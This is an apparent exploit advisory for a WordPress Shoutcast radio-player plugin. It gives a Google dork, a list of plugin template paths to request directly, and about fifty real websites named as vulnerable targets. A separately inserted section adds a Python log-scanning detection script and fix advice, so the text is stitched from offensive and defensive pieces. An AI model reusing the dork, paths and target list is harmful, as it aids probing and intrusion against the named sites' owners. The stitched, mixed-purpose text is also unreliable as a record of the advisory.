KingSkrupellos

WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x Exploit

Jan 14th, 2019
#########################################################################################

# Exploit Title : WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player/17162755
codecanyon.net/item/sticky-radio-player-full-width-shoutcast-and-icecast-html5-player/16897465
# Software Price : $15 and $19
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : From 3.0 to 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

#########################################################################################
  22.  
# Impact :
********

* WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x and other versions are prone to an arbitrary file disclosure
vulnerability because the plugin fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process,
which may aid in launching further attacks.

* An information exposure (CWE-200) is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible to actors outside of
the intended control sphere (CWE-538).

* The software uses external input to construct a pathname that is intended to identify a file or directory
located underneath a restricted parent directory, but it does not properly neutralize special elements within
the pathname, so the pathname can resolve to a location outside of the restricted directory (CWE-22).
  49.  
#########################################################################################

# Exploit :
***********************

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Categories
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/categories.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_player.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_playlist_record.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Add_New
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Help
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/help.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/players.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/preview.html
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/playlist.php
/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/settings_form.php

#########################################################################################
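The paths above are admin templates that are normally loaded through /wp-admin/admin.php?page=..., so a request for the tpl/*.php file itself is the signal a site owner should look for in the web server logs. The script below is an added detection example written for this advisory; it is not the advisory's or the plugin's own code. It assumes an Apache/nginx "combined" access-log format, assumes that direct requests to the plugin's tpl/ directory never occur during legitimate use, and treats dot-dot segments in the path or query string as generic CWE-22 probing (the advisory cites CWE-22 but shows no traversal payload, so that label is this example's assumption). The log lines are constructed samples using RFC 5737 test addresses.

```python
"""Added detection example (not from the advisory): flag access-log entries
that request the plugin's tpl/ files directly."""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Directory whose files the advisory lists as directly reachable.
PLUGIN_TPL = "/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/"

# One Apache/nginx "combined" log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (not real traffic). Line 2 shows a sub-directory
# install (/wp/), line 3 is the legitimate admin route, line 4 a double-encoded
# dot-dot probe, line 5 a harmless static asset from the same plugin.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jan/2019:10:22:01 +0000] "GET /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php HTTP/1.1" 200 2311 "-" "curl/7.58"',
    '203.0.113.5 - - [14/Jan/2019:10:22:03 +0000] "GET /wp/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players HTTP/1.1" 200 4120 "-" "curl/7.58"',
    '198.51.100.7 - - [14/Jan/2019:10:25:44 +0000] "GET /wp-admin/admin.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Jan/2019:10:30:00 +0000] "GET /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/%2e%2e/%2e%2e/settings.php HTTP/1.1" 404 210 "-" "python-requests/2.21"',
    '192.0.2.1 - - [14/Jan/2019:10:31:00 +0000] "GET /wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/js/player.js HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]


def decode(s: str) -> str:
    """Percent-decode twice so double-encoded dot-dot segments become visible."""
    return unquote(unquote(s))


def classify(target: str):
    """Label a request target: 'direct-tpl-access', 'traversal-attempt' or None."""
    parts = urlsplit(target)
    path = decode(parts.path).lower()
    idx = path.find(PLUGIN_TPL)          # plugin may sit under a sub-directory
    if idx < 0:
        return None
    rest = path[idx + len(PLUGIN_TPL):]
    if ".." in rest or ".." in decode(parts.query):
        return "traversal-attempt"       # assumption: dot-dot here is CWE-22 probing
    return "direct-tpl-access"


def scan_log(lines):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparsable line; a real tool would count these
        label = classify(m["target"])
        if label:
            findings.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]),
                             "target": m["target"], "label": label})
    return findings


def by_source(findings):
    """Count findings per client address for a quick triage view."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        # A 200 on a direct tpl request means the template rendered outside the admin context.
        print(f"{f['time']}  {f['ip']:<13} {f['status']}  {f['label']:<18} {f['target']}")
```

A 200 response on a flagged direct request confirms the template renders without the WordPress admin context; a 404 on a dot-dot path shows probing that did not succeed. The usual fix on the plugin side is the standard WordPress guard at the top of every included PHP file (`if ( ! defined( 'ABSPATH' ) ) { exit; }`), and a site owner who cannot update can deny direct requests to the plugin's tpl/ directory at the web server until a patched version is installed.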
  84.  
# Video Tutorials

Installation - youtube.com/watch?v=AnhaPcIZUjc
Manage the Categories and Playlist - youtube.com/watch?v=pZynu26UKbs
How to insert the player into your website - youtube.com/watch?v=RY3ikHSdTNg

#########################################################################################
  92.  
# Example Vulnerable Sites :
*************************

[+] frissfm.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiopela.mk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] onadesants.cat/wp/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] pensereal.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] ukieradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] giveme5prod.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radyomedya.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radioplus.org.uk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] thespyfm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] mensajerofm.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] fmcidadejardim.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] fondationfemidejabat.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] superlivefm.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] unicolegio.com/home/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radioe.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radioarcadie.net/cercle/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] santaupdate.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] sahinfm.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] horebradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiobanglanet.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiosantacruz.com.br/online/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] proyectovidamcym.com.uy/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiokontho.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] misionvidainternacional.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radio7.co.tz/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] dizzimonline.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] caraotaradio.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] escandalofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] koswradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radio-busovaca.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] eldesconcierto.com.ar/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] gunbitas.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] canarinhofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] resguardoicl.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiovioladeouro.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] cadenaradialjupiter.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radyo-anadolu.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] buenaventuraenlinea.com/bradio/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] elfhq.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radioserbona.rs/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] renewx.gq/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radiociresarii.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] vibez24.com.ng/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] lol-corsica.fr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] confidencialacesse.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] radioparaisofm.cl/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] lapicosa.com.mx/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php
[+] caraotaradio.ml/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################